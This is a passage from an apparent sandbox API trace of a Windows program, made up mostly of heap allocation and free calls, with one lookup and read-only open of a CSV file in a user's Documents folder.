returned 0x43e24a0 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0079.705] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0079.705] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\sAJ5q4Jpz7.csv", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36c3c2c0, ftCreationTime.dwHighDateTime=0x1d5e967, ftLastAccessTime.dwLowDateTime=0xefd1a510, ftLastAccessTime.dwHighDateTime=0x1d5efe9, ftLastWriteTime.dwLowDateTime=0xefd1a510, ftLastWriteTime.dwHighDateTime=0x1d5efe9, nFileSizeHigh=0x0, nFileSizeLow=0x12013, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="sAJ5q4Jpz7.csv", cAlternateFileName="SAJ5Q4~1.CSV")) returned 0x41ac000 [0079.705] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0079.706] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.706] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0079.706] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0079.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.708] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4ae0 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.710] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0079.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cac40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0079.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\sAJ5q4Jpz7.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\saj5q4jpz7.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0079.712] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.713] 